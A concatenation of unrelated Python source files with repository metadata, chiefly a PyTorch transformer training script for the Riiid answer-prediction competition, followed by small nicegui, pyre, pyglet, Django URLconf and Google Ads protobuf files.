return item_ary[idx_dict[key], :][1:]
return {
"x": get_data(key="answered_correctly", remove_now=True) + 2, # 1: lecture, 2: not correct, 3: correct
"user_answer": get_data(key="user_answer", remove_now=True) + 1,
"target_id": get_data(key=("content_id", "content_type_id")),
"part": get_data(key="part"),
"elapsed_time": get_data(key="prior_question_elapsed_time_bin300"),
"duration_previous_content": get_data(key="duration_previous_content_bin300"),
"label": get_data(key="answered_correctly"),
"prior_q": get_data(key="prior_question_had_explanation"),
"rate_diff": get_data(key="rating_diff_content_user_id"),
"container_id": get_data(key="task_container_id_bin300"),
"previous_answer_index_content_id": get_data(key="previous_answer_index_content_id"),
"previous_answer_content_id": get_data(key="previous_answer_content_id"),
"timediff-elapsedtime_bin500": get_data(key="timediff-elapsedtime_bin500"),
"prior_content_id": get_data(key=("content_id", "content_type_id"), remove_now=True)
}
class FFN(nn.Module):
def __init__(self, state_size=200):
super(FFN, self).__init__()
self.state_size = state_size
self.lr1 = nn.Linear(state_size, state_size)
self.ln1 = nn.LayerNorm(state_size)
self.relu = nn.ReLU()
self.lr2 = nn.Linear(state_size, state_size)
self.ln2 = nn.LayerNorm(state_size)
def forward(self, x):
x = self.lr1(x)
x = self.ln1(x)
x = self.relu(x)
x = self.lr2(x)
x = self.ln2(x)
return x
class ContEmbedding(nn.Module):
def __init__(self, input_dim, embed_dim, seq_len):
super(ContEmbedding, self).__init__()
self.embed_dim = embed_dim
self.bn = nn.BatchNorm1d(seq_len-1)
self.gru = nn.GRU(input_size=input_dim, hidden_size=embed_dim // 2)
self.ln2 = nn.LayerNorm(embed_dim // 2)
def forward(self, x):
x = self.bn(x)
x, _ = self.gru(x)
x = self.ln2(x)
return x
def future_mask(seq_length):
future_mask = np.triu(np.ones((seq_length, seq_length)), k=1).astype('bool')
return torch.from_numpy(future_mask)
class CatEmbedding(nn.Module):
def __init__(self, embed_dim):
super(CatEmbedding, self).__init__()
self.embed_dim = embed_dim
self.ln1 = nn.LayerNorm(embed_dim)
self.gru = nn.GRU(input_size=embed_dim, hidden_size=embed_dim // 2)
self.ln2 = nn.LayerNorm(embed_dim // 2)
def forward(self, x):
x = self.ln1(x)
x, _ = self.gru(x)
x = self.ln2(x)
return x
class ContEmbedding(nn.Module):
def __init__(self, input_dim, embed_dim, seq_len):
super(ContEmbedding, self).__init__()
self.embed_dim = embed_dim
self.bn = nn.BatchNorm1d(seq_len-1)
self.gru = nn.GRU(input_size=input_dim, hidden_size=embed_dim)
self.ln2 = nn.LayerNorm(embed_dim)
def forward(self, x):
x = self.bn(x)
x, _ = self.gru(x)
x = self.ln2(x)
return x
class SAKTModel(nn.Module):
def __init__(self, n_skill, max_seq=100, embed_dim=128, num_heads=8, dropout=0.2,
cont_emb=None):
super(SAKTModel, self).__init__()
self.n_skill = n_skill
self.embed_dim_cat = embed_dim
embed_dim_small_cat = 32
embed_dim_middle_cat = 32
embed_dim_cat_all = embed_dim_small_cat*5 + embed_dim_middle_cat*5 + embed_dim
embed_dim_all = embed_dim_cat_all + cont_emb
self.embedding = nn.Embedding(4, embed_dim_small_cat)
self.user_answer_embedding = nn.Embedding(6, self.embed_dim_cat)
self.prior_question_had_explanation_embedding = nn.Embedding(4, embed_dim_small_cat)
self.e_embedding = nn.Embedding(n_skill + 1, self.embed_dim_cat)
self.part_embedding = nn.Embedding(8, embed_dim_small_cat)
self.elapsed_time_embedding = nn.Embedding(302, embed_dim_middle_cat)
self.duration_previous_content_embedding = nn.Embedding(302, embed_dim_middle_cat)
self.container_embedding = nn.Embedding(302, embed_dim_middle_cat)
self.prev_ans_idx_embedding = nn.Embedding(302, embed_dim_middle_cat)
self.prev_ans_content_id_embedding = nn.Embedding(4, embed_dim_small_cat)
self.timediff_elapsedtime_embedding = nn.Embedding(502, embed_dim_middle_cat)
encoder_layer = nn.TransformerEncoderLayer(d_model=embed_dim_all, nhead=num_heads, dropout=dropout)
self.transformer_enc = nn.TransformerEncoder(encoder_layer=encoder_layer, num_layers=4)
self.gru = nn.GRU(input_size=embed_dim_all, hidden_size=embed_dim_all)
self.continuous_embedding = ContEmbedding(input_dim=1, embed_dim=cont_emb, seq_len=max_seq)
self.prior_content_embedding = nn.Sequential(
nn.Linear(self.embed_dim_cat, embed_dim_small_cat),
nn.LayerNorm(embed_dim_small_cat)
)
self.cat_embedding = nn.Sequential(
nn.Linear(embed_dim_cat_all, embed_dim_cat_all),
nn.LayerNorm(embed_dim_cat_all)
)
self.layer_normal = nn.LayerNorm(embed_dim_all)
self.ffn = FFN(embed_dim_all)
self.dropout = nn.Dropout(dropout/2)
self.pred = nn.Linear(embed_dim_all, 1)
def forward(self, item, device):
x = item["x"].to(device).long()
question_ids = item["target_id"].to(device).long()
parts = item["part"].to(device).long()
label = item["label"].to(device).float()
elapsed_time = item["elapsed_time"].to(device).long()
duration_previous_content = item["duration_previous_content"].to(device).long()
prior_q = item["prior_q"].to(device).long()
user_answer = item["user_answer"].to(device).long()
rate_diff = item["rate_diff"].to(device).float()
container_id = item["container_id"].to(device).long()
prev_ans_idx = item["previous_answer_index_content_id"].to(device).long()
prior_content_id_ans_correctly = item["previous_answer_content_id"].to(device).long()
prior_content_id = item["prior_content_id"].to(device).long()
timediff_elapsedtime = item["timediff-elapsedtime_bin500"].to(device).long()
att_mask = future_mask(x.size(1)).to(device)
e = self.e_embedding(question_ids)
p = self.part_embedding(parts)
prior_q_emb = self.prior_question_had_explanation_embedding(prior_q)
user_answer_emb = self.user_answer_embedding(user_answer)
prior_content_id_emb = self.e_embedding(prior_content_id)
prior_content_user_answer_emb = self.prior_content_embedding(user_answer_emb + prior_content_id_emb)
timediff_elapsedtime_emb = self.timediff_elapsedtime_embedding(timediff_elapsedtime)
# decoder
x = self.embedding(x)
el_time_emb = self.elapsed_time_embedding(elapsed_time)
dur_emb = self.duration_previous_content_embedding(duration_previous_content)
container_emb = self.container_embedding(container_id)
prev_ans_idx_emb = self.prev_ans_idx_embedding(prev_ans_idx)
prev_ans_content_id_emb = self.prev_ans_content_id_embedding(prior_content_id_ans_correctly)
x = torch.cat([x, el_time_emb, dur_emb, e, p, prior_q_emb, container_emb,
prev_ans_idx_emb, prev_ans_content_id_emb,
prior_content_user_answer_emb,
timediff_elapsedtime_emb], dim=2)
cont = rate_diff
cont_emb = self.continuous_embedding(cont.view(x.size(0), x.size(1), -1))
x = self.cat_embedding(x)
x = torch.cat([x, cont_emb], dim=2)
x = x.permute(1, 0, 2) # x: [bs, s_len, embed] => [s_len, bs, embed]
att_dec = self.transformer_enc(x,
mask=att_mask)
att_dec, _ = self.gru(att_dec)
att_dec = att_dec.permute(1, 0, 2) # att_output: [s_len, bs, embed] => [bs, s_len, embed]
x = self.layer_normal(att_dec)
x = self.ffn(x) + att_dec
x = self.dropout(x)
x = self.pred(x)
return x.squeeze(-1)
def train_epoch(model, train_iterator, val_iterator, optim, criterion, scheduler, epoch, device="cuda"):
model.train()
train_loss = []
num_corrects = 0
num_total = 0
labels = []
outs = []
tbar = tqdm(train_iterator)
for item in tbar:
optim.zero_grad()
label = item["label"].to(device).float()
output = model(item, device)
target_idx = (label.view(-1) >= 0).nonzero()
loss = criterion(output.view(-1)[target_idx], label.view(-1)[target_idx])
loss.backward()
optim.step()
scheduler.step()
train_loss.append(loss.item())
output = output[:, -1]
label = label[:, -1]
target_idx = (label.view(-1) >= 0).nonzero()
pred = (torch.sigmoid(output) >= 0.5).long()
num_corrects += (pred.view(-1)[target_idx] == label.view(-1)[target_idx]).sum().item()
num_total += len(label)
labels.extend(label.view(-1)[target_idx].data.cpu().numpy())
outs.extend(output.view(-1)[target_idx].data.cpu().numpy())
tbar.set_description('loss - {:.4f}'.format(loss))
acc = num_corrects / num_total
auc = roc_auc_score(labels, outs)
loss = np.mean(train_loss)
preds = []
labels = []
model.eval()
i = 0
with torch.no_grad():
for item in tqdm(val_iterator):
label = item["label"].to(device).float()
output = model(item, device)
preds.extend(torch.nn.Sigmoid()(output[:, -1]).view(-1).data.cpu().numpy().tolist())
labels.extend(label[:, -1].view(-1).data.cpu().numpy())
i += 1
if i > 100 and epoch < 10:
break
auc_val = roc_auc_score(labels, preds)
return loss, acc, auc, auc_val
def main(params: dict,
output_dir: str):
import mlflow
print("start params={}".format(params))
model_id = "all"
logger = get_logger()
df = pd.read_pickle("../input/riiid-test-answer-prediction/train_merged.pickle")
# df = pd.read_pickle("../input/riiid-test-answer-prediction/split10/train_0.pickle").sort_values(["user_id", "timestamp"]).reset_index(drop=True)
if is_debug:
df = df.head(30000)
df["prior_question_had_explanation"] = df["prior_question_had_explanation"].fillna(-1)
# df["answered_correctly"] = df["answered_correctly"].replace(-1, np.nan)
column_config = {
("content_id", "content_type_id"): {"type": "category"},
"user_answer": {"type": "leakage_feature"},
"answered_correctly": {"type": "leakage_feature"},
"part": {"type": "category"},
"prior_question_elapsed_time_bin300": {"type": "category"},
"duration_previous_content_bin300": {"type": "category"},
"prior_question_had_explanation": {"type": "category"},
"rating_diff_content_user_id": {"type": "numeric"},
"task_container_id_bin300": {"type": "category"},
"previous_answer_index_content_id": {"type": "category"},
"previous_answer_content_id": {"type": "category"},
"timediff-elapsedtime_bin500": {"type": "category"}
}
if not load_pickle or is_debug:
feature_factory_dict = {"user_id": {}}
feature_factory_dict["user_id"]["DurationPreviousContent"] = DurationPreviousContent(is_partial_fit=True)
feature_factory_dict["user_id"]["ElapsedTimeBinningEncoder"] = ElapsedTimeBinningEncoder()
feature_factory_dict["user_id"]["UserContentRateEncoder"] = UserContentRateEncoder(rate_func="elo",
column="user_id")
feature_factory_dict["user_id"]["PreviousAnswer2"] = PreviousAnswer2(groupby="user_id",
column="content_id",
is_debug=is_debug,
model_id=model_id,
n=300)
feature_factory_dict["user_id"]["StudyTermEncoder2"] = StudyTermEncoder2(is_partial_fit=True)
feature_factory_dict["user_id"][f"MeanAggregatorStudyTimebyUserId"] = MeanAggregator(column="user_id",
agg_column="study_time",
remove_now=False)
feature_factory_dict["user_id"]["ElapsedTimeMeanByContentIdEncoder"] = ElapsedTimeMeanByContentIdEncoder()
feature_factory_dict["post"] = {
"DurationFeaturePostProcess": DurationFeaturePostProcess()
}
feature_factory_manager = FeatureFactoryManager(feature_factory_dict=feature_factory_dict,
logger=logger,
split_num=1,
model_id=model_id,
load_feature=not is_debug,
save_feature=not is_debug)
print("all_predict")
df = feature_factory_manager.all_predict(df)
def f(x):
x = x // 1000
if x < -90:
return -90
if x > 90:
return 90
return x
df["task_container_id_bin300"] = [x if x < 300 else 300 for x in df["task_container_id"]]
df["timediff-elapsedtime_bin500"] = [f(x) for x in df["timediff-elapsedtime"].values]
df = df[["user_id", "content_id", "content_type_id", "part", "user_answer", "answered_correctly",
"prior_question_elapsed_time_bin300", "duration_previous_content_bin300",
"prior_question_had_explanation", "rating_diff_content_user_id", "task_container_id_bin300",
"previous_answer_index_content_id", "previous_answer_content_id", "row_id",
"timediff-elapsedtime_bin500"]]
print(df.head(10))
print("data preprocess")
ff_for_transformer = FeatureFactoryForTransformer(column_config=column_config,
dict_path="../feature_engineering/",
sequence_length=params["max_seq"],
logger=logger)
ff_for_transformer.make_dict(df=df)
n_skill = len(ff_for_transformer.embbed_dict[("content_id", "content_type_id")])
if not load_pickle or is_debug:
df_val_row = pd.read_feather("../input/riiid-test-answer-prediction/train_transformer_last2500k_only_row_id.feather")
if is_debug:
df_val_row = df_val_row.head(3000)
df_val_row["is_val"] = 1
df = pd.merge(df, df_val_row, how="left", on="row_id")
df["is_val"] = df["is_val"].fillna(0)
print(df["is_val"].value_counts())
w_df = df[df["is_val"] == 0]
w_df["group"] = (w_df.groupby("user_id")["user_id"].transform("count") - w_df.groupby("user_id").cumcount()) // params["max_seq"]
w_df["user_id"] = w_df["user_id"].astype(str) + "_" + w_df["group"].astype(str)
group = ff_for_transformer.all_predict(w_df)
dataset_train = SAKTDataset(group,
n_skill=n_skill,
max_seq=params["max_seq"])
del w_df
gc.collect()
ff_for_transformer = FeatureFactoryForTransformer(column_config=column_config,
dict_path="../feature_engineering/",
sequence_length=params["max_seq"],
logger=logger)
if not load_pickle or is_debug:
group = ff_for_transformer.all_predict(df[df["content_type_id"] == 0])
dataset_val = SAKTDataset(group,
is_test=True,
n_skill=n_skill,
max_seq=params["max_seq"])
os.makedirs("../input/feature_engineering/model225", exist_ok=True)
if not is_debug and not load_pickle:
with open(f"../input/feature_engineering/model225/train.pickle", "wb") as f:
pickle.dump(dataset_train, f)
with open(f"../input/feature_engineering/model225/val.pickle", "wb") as f:
pickle.dump(dataset_val, f)
if not is_debug and load_pickle:
with open(f"../input/feature_engineering/model225/train.pickle", "rb") as f:
dataset_train = pickle.load(f)
with open(f"../input/feature_engineering/model225/val.pickle", "rb") as f:
dataset_val = pickle.load(f)
print("loaded!")
dataloader_train = DataLoader(dataset_train, batch_size=params["batch_size"], shuffle=True)
dataloader_val = DataLoader(dataset_val, batch_size=params["batch_size"], shuffle=False)
model = SAKTModel(n_skill, embed_dim=params["embed_dim"], max_seq=params["max_seq"], dropout=dropout,
cont_emb=params["cont_emb"])
param_optimizer = list(model.named_parameters())
no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']
optimizer_grouped_parameters = [
{'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)], 'weight_decay': 0.01},
{'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}
]
optimizer = AdamW(optimizer_grouped_parameters,
lr=params["lr"],
weight_decay=0.01,
)
num_train_optimization_steps = int(len(dataloader_train) * 20)
scheduler = get_linear_schedule_with_warmup(optimizer,
num_warmup_steps=params["num_warmup_steps"],
num_training_steps=num_train_optimization_steps)
criterion = nn.BCEWithLogitsLoss()
model.to(device)
criterion.to(device)
for epoch in range(epochs):
loss, acc, auc, auc_val = train_epoch(model, dataloader_train, dataloader_val, optimizer, criterion, scheduler,
epoch, device)
print("epoch - {} train_loss - {:.3f} auc - {:.4f} auc-val: {:.4f}".format(epoch, loss, auc, auc_val))
torch.save(model.state_dict(), f"{output_dir}/transformers_epoch{epoch}_auc{round(auc, 4)}.pth")
preds = []
labels = []
with torch.no_grad():
for item in tqdm(dataloader_val):
label = item["label"].to(device).float()
output = model(item, device)
preds.extend(torch.nn.Sigmoid()(output[:, -1]).view(-1).data.cpu().numpy().tolist())
labels.extend(label[:, -1].view(-1).data.cpu().numpy().tolist())
auc_transformer = roc_auc_score(labels, preds)
print("single transformer: {:.4f}".format(auc_transformer))
df_oof = pd.DataFrame()
# df_oof["row_id"] = df.loc[val_idx].index
print(len(dataloader_val))
print(len(preds))
df_oof["predict"] = preds
df_oof["target"] = labels
df_oof.to_csv(f"{output_dir}/transformers1.csv", index=False)
"""
df_oof2 = pd.read_csv("../output/ex_237/20201213110353/oof_train_0_lgbm.csv")
df_oof2.columns = ["row_id", "predict_lgbm", "target"]
df_oof2 = pd.merge(df_oof, df_oof2, how="inner")
auc_lgbm = roc_auc_score(df_oof2["target"].values, df_oof2["predict_lgbm"].values)
print("lgbm: {:.4f}".format(auc_lgbm))
print("ensemble")
max_auc = 0
max_nn_ratio = 0
for r in np.arange(0, 1.05, 0.05):
auc = roc_auc_score(df_oof2["target"].values, df_oof2["predict_lgbm"].values*(1-r) + df_oof2["predict"].values*r)
print("[nn_ratio: {:.2f}] AUC: {:.4f}".format(r, auc))
if max_auc < auc:
max_auc = auc
max_nn_ratio = r
print(len(df_oof2))
"""
if not is_debug:
mlflow.start_run(experiment_id=10,
run_name=os.path.basename(__file__))
for key, value in params.items():
mlflow.log_param(key, value)
mlflow.log_metric("auc_val", auc_transformer)
mlflow.end_run()
torch.save(model.state_dict(), f"{output_dir}/transformers.pth")
del model
torch.cuda.empty_cache()
with open(f"{output_dir}/transformer_param.json", "w") as f:
json.dump(params, f)
if is_make_feature_factory:
# feature factory
feature_factory_dict = {"user_id": {}}
feature_factory_dict["user_id"]["DurationPreviousContent"] = DurationPreviousContent(is_partial_fit=True)
feature_factory_dict["user_id"]["ElapsedTimeBinningEncoder"] = ElapsedTimeBinningEncoder()
feature_factory_manager = FeatureFactoryManager(feature_factory_dict=feature_factory_dict,
logger=logger,
split_num=1,
model_id="all",
load_feature=not is_debug,
save_feature=not is_debug)
ff_for_transformer = FeatureFactoryForTransformer(column_config=column_config,
dict_path="../feature_engineering/",
sequence_length=params["max_seq"],
logger=logger)
df = pd.read_pickle("../input/riiid-test-answer-prediction/train_merged.pickle")
if is_debug:
df = df.head(10000)
df = df.sort_values(["user_id", "timestamp"]).reset_index(drop=True)
feature_factory_manager.fit(df)
df = feature_factory_manager.all_predict(df)
for dicts in feature_factory_manager.feature_factory_dict.values():
for factory in dicts.values():
factory.logger = None
feature_factory_manager.logger = None
with open(f"{output_dir}/feature_factory_manager.pickle", "wb") as f:
pickle.dump(feature_factory_manager, f)
ff_for_transformer.fit(df)
ff_for_transformer.logger = None
with open(f"{output_dir}/feature_factory_manager_for_transformer.pickle", "wb") as f:
pickle.dump(ff_for_transformer, f)
if __name__ == "__main__":
    # Optional startup delay (one tqdm tick per second); skipped in debug runs.
    if not is_debug:
        for _ in tqdm(range(wait_time)):
            time.sleep(1)
    # One timestamped output directory per run, named after this script file.
    output_dir = f"../output/{os.path.basename(__file__).replace('.py', '')}/{dt.now().strftime('%Y%m%d%H%M%S')}/"
    os.makedirs(output_dir, exist_ok=True)
    # Single-point "grid" over embedding sizes: continuous (cont_emb) and
    # categorical (cat_emb -> embed_dim).
    for cont_emb in [8]:
        for cat_emb in [256]:
            dropout = 0.2
            lr = 0.8e-3
            # Tiny batch in debug mode for fast iteration.
            if is_debug:
                batch_size = 8
            else:
                batch_size = 128
            # Hyperparameters consumed by main() and logged to mlflow there.
            params = {"embed_dim": cat_emb,
                      "cont_emb": cont_emb,
                      "max_seq": 100,
                      "batch_size": batch_size,
                      "num_warmup_steps": 12000,
                      "lr": lr,
                      "dropout": dropout}
main(params, output_dir=output_dir) | [
"[email protected]"
] | |
17c14221dd22255ed751dc3f60dafc64a8e62399 | 01857ef455ea60eccaf03b5a9059ec83e9803c2e | /nicegui/tailwind_types/text_align.py | 476e196f84b46e2c187f30f1984c510e8a9430c5 | [
"MIT"
] | permissive | zauberzeug/nicegui | f08312cc1f393deca79e0e84a2506d3a35efff16 | c61b1315f29d51e26cc1168207f5616b302f8df0 | refs/heads/main | 2023-08-18T18:09:30.937322 | 2023-08-18T15:04:00 | 2023-08-18T15:04:00 | 365,250,183 | 5,128 | 271 | MIT | 2023-09-14T01:50:56 | 2021-05-07T13:55:05 | Python | UTF-8 | Python | false | false | 129 | py | from typing import Literal
# Accepted values for the Tailwind text-align utility.
TextAlign = Literal['left', 'center', 'right', 'justify', 'start', 'end']
| [
"[email protected]"
] | |
462611dfa57951daafc012909847ccf8fa2f644e | 60c84d8dc4b30731193745bf0580584087efe337 | /examples/hello/hello.py | 53bd3f56564ec3d0888b59c23c85a01ffe0e0ee1 | [] | no_license | danse-inelastic/pyregui | f321917f6c0c955356d8b87f6466c3acddd5b194 | 3d7f90352361cbdbaa553002be6e810e84b3f44d | refs/heads/master | 2020-04-05T18:57:14.422685 | 2013-06-14T00:30:44 | 2013-06-14T00:30:44 | 34,145,791 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,078 | py | #!/usr/bin/env python
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
#
# {LicenseText}
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
from pyre.components.Component import Component
class hello(Component):
    'A greeter that says "hello"'

    class Inventory(Component.Inventory):
        # Configurable greeting word; defaults to "hello".
        import pyre.inventory
        greeting = pyre.inventory.str('greeting', default='hello')
        pass

    def __init__(self, name, facility="greeter"):
        Component.__init__(self, name, facility=facility)
        return

    def greet(self, name):
        # Emit "<greeting> <name>" on stdout.
        print("%s %s" % (self.greeting, name))
        return

    def _defaults(self):
        Component._defaults(self)
        return

    def _configure(self):
        # Copy the configured greeting from the inventory onto the component.
        Component._configure(self)
        self.greeting = self.inventory.greeting
        return

    def _init(self):
        Component._init(self)
        return
def greeter():
    """Factory: build the default 'hello' greeter component."""
    return hello('hello')
# version
__id__ = "$Id$"
# End of file
| [
"[email protected]"
] | |
95f1540887394030c26f2f55d4910567d0642e49 | 6dfa271fb41c9d4a1a74ce34c4bee252a2d86291 | /sympy/thirdparty/pyglet/pyglet/window/xlib/cursorfont.py | 16c5e740ecd81ff97be40c31104783842b690ad0 | [
"BSD-3-Clause"
] | permissive | gnulinooks/sympy | 7e4776cd1ea24bde56dbc17207611a9bc7523e50 | 46f63841f96cd025289b91ba9db3e261138d720a | refs/heads/master | 2016-09-10T18:56:49.556138 | 2009-04-05T14:10:49 | 2009-04-05T14:10:49 | 169,114 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,295 | py | # ----------------------------------------------------------------------------
# pyglet
# Copyright (c) 2006-2007 Alex Holkner
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of the pyglet nor the names of its
# contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
'''
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id: cursorfont.py 1322 2007-10-23 12:58:03Z Alex.Holkner $'
# /usr/include/X11/cursorfont.h
# Cursor glyph indices, mirroring /usr/include/X11/cursorfont.h (see the
# comment above).  All values are even; NOTE(review): in X11 the odd index
# following each glyph is conventionally its mask -- confirm before relying
# on that here, as this module only defines the even glyph ids.
XC_num_glyphs = 154
XC_X_cursor = 0
XC_arrow = 2
XC_based_arrow_down = 4
XC_based_arrow_up = 6
XC_boat = 8
XC_bogosity = 10
XC_bottom_left_corner = 12
XC_bottom_right_corner = 14
XC_bottom_side = 16
XC_bottom_tee = 18
XC_box_spiral = 20
XC_center_ptr = 22
XC_circle = 24
XC_clock = 26
XC_coffee_mug = 28
XC_cross = 30
XC_cross_reverse = 32
XC_crosshair = 34
XC_diamond_cross = 36
XC_dot = 38
XC_dotbox = 40
XC_double_arrow = 42
XC_draft_large = 44
XC_draft_small = 46
XC_draped_box = 48
XC_exchange = 50
XC_fleur = 52
XC_gobbler = 54
XC_gumby = 56
XC_hand1 = 58
XC_hand2 = 60
XC_heart = 62
XC_icon = 64
XC_iron_cross = 66
XC_left_ptr = 68
XC_left_side = 70
XC_left_tee = 72
XC_leftbutton = 74
XC_ll_angle = 76
XC_lr_angle = 78
XC_man = 80
XC_middlebutton = 82
XC_mouse = 84
XC_pencil = 86
XC_pirate = 88
XC_plus = 90
XC_question_arrow = 92
XC_right_ptr = 94
XC_right_side = 96
XC_right_tee = 98
XC_rightbutton = 100
XC_rtl_logo = 102
XC_sailboat = 104
XC_sb_down_arrow = 106
XC_sb_h_double_arrow = 108
XC_sb_left_arrow = 110
XC_sb_right_arrow = 112
XC_sb_up_arrow = 114
XC_sb_v_double_arrow = 116
XC_shuttle = 118
XC_sizing = 120
XC_spider = 122
XC_spraycan = 124
XC_star = 126
XC_target = 128
XC_tcross = 130
XC_top_left_arrow = 132
XC_top_left_corner = 134
XC_top_right_corner = 136
XC_top_side = 138
XC_top_tee = 140
XC_trek = 142
XC_ul_angle = 144
XC_umbrella = 146
XC_ur_angle = 148
XC_watch = 150
XC_xterm = 152
| [
"[email protected]"
] | |
733f9358c73617a8542ae58b5af6e60c4fd3b6da | 831fc9a25077345226874a103a46724a3906ddbe | /b_list/urls.py | 5b00c938cb3bbe4efe019852ead1926ef5a8a777 | [
"BSD-3-Clause"
] | permissive | softwareprojectPHD/b_list | a2f6c0890b0dbd348c77d62cdac81db69ea2e2c3 | 7efc5d15750b0fd366a40eef4794a0356f309327 | refs/heads/master | 2020-12-25T09:27:44.477238 | 2016-04-16T03:54:13 | 2016-04-17T03:58:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,378 | py | """
Root URLconf.
"""
from django.conf.urls import include
from django.conf.urls import url
from django.contrib import admin
from blog.views import EntryArchiveIndex
from flashpolicies.views import no_access
# Redirect views which prevent an older URL scheme from 404'ing.
from . import views
# Primary URL patterns for the site.
urls = [
    url(r'^admin/', include(admin.site.urls)),
    # Home page: the blog's entry archive index rendered with a custom template.
    url(r'^$',
        EntryArchiveIndex.as_view(
            template_name='home.html',
        ),
        name='home'),
    url(r'^contact/', include('contact_form.urls')),
    url(r'^feeds/', include('blog.urls.feeds')),
    url(r'^projects/', include('projects.urls')),
    url(r'^weblog/categories/', include('blog.urls.categories')),
    url(r'^weblog/', include('blog.urls.entries')),
    # Deny-all Flash cross-domain policy file.
    url(r'^crossdomain.xml$', no_access),
]

# Redirects that keep an older URL scheme from 404'ing (views defined in
# the local views module imported above).
legacy = [
    url(r'^links/', views.gone),
    url(r'^weblog/(?P<year>\d{4})/(?P<month>\d{2})/$',
        views.EntryMonthRedirect.as_view()),
    url(r'^weblog/(?P<year>\d{4})/(?P<month>\d{2})/(?P<day>\d{2})/$',
        views.EntryDayRedirect.as_view()),
    url(r'^weblog/(?P<year>\d{4})/(?P<month>\d{2})/(?P<day>\d{2})/(?P<slug>[-\w]+)/$',
        views.EntryDetailRedirect.as_view()),
    url(r'^media/(?P<path>.*)$', views.MediaRedirect.as_view()),
]

# The redirecting patterns come first; otherwise, the main URLs would
# catch those and 404.
urlpatterns = legacy + urls
| [
"[email protected]"
] | |
9c079ffee4a8446340856d6c9a3f18c21f3f77a0 | a81c1492783e7cafcaf7da5f0402d2d283b7ce37 | /google/ads/google_ads/v6/proto/errors/account_link_error_pb2.py | bcb4b476f4b191721a76ed542da5e88fb13651ea | [
"Apache-2.0"
] | permissive | VincentFritzsche/google-ads-python | 6650cf426b34392d1f58fb912cb3fc25b848e766 | 969eff5b6c3cec59d21191fa178cffb6270074c3 | refs/heads/master | 2023-03-19T17:23:26.959021 | 2021-03-18T18:18:38 | 2021-03-18T18:18:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | true | 3,974 | py | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/ads/googleads/v6/errors/account_link_error.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.api import annotations_pb2 as google_dot_api_dot_annotations__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='google/ads/googleads/v6/errors/account_link_error.proto',
package='google.ads.googleads.v6.errors',
syntax='proto3',
serialized_options=b'\n\"com.google.ads.googleads.v6.errorsB\025AccountLinkErrorProtoP\001ZDgoogle.golang.org/genproto/googleapis/ads/googleads/v6/errors;errors\242\002\003GAA\252\002\036Google.Ads.GoogleAds.V6.Errors\312\002\036Google\\Ads\\GoogleAds\\V6\\Errors\352\002\"Google::Ads::GoogleAds::V6::Errors',
create_key=_descriptor._internal_create_key,
serialized_pb=b'\n7google/ads/googleads/v6/errors/account_link_error.proto\x12\x1egoogle.ads.googleads.v6.errors\x1a\x1cgoogle/api/annotations.proto\"\\\n\x14\x41\x63\x63ountLinkErrorEnum\"D\n\x10\x41\x63\x63ountLinkError\x12\x0f\n\x0bUNSPECIFIED\x10\x00\x12\x0b\n\x07UNKNOWN\x10\x01\x12\x12\n\x0eINVALID_STATUS\x10\x02\x42\xf0\x01\n\"com.google.ads.googleads.v6.errorsB\x15\x41\x63\x63ountLinkErrorProtoP\x01ZDgoogle.golang.org/genproto/googleapis/ads/googleads/v6/errors;errors\xa2\x02\x03GAA\xaa\x02\x1eGoogle.Ads.GoogleAds.V6.Errors\xca\x02\x1eGoogle\\Ads\\GoogleAds\\V6\\Errors\xea\x02\"Google::Ads::GoogleAds::V6::Errorsb\x06proto3'
,
dependencies=[google_dot_api_dot_annotations__pb2.DESCRIPTOR,])
_ACCOUNTLINKERRORENUM_ACCOUNTLINKERROR = _descriptor.EnumDescriptor(
name='AccountLinkError',
full_name='google.ads.googleads.v6.errors.AccountLinkErrorEnum.AccountLinkError',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='UNSPECIFIED', index=0, number=0,
serialized_options=None,
type=None,
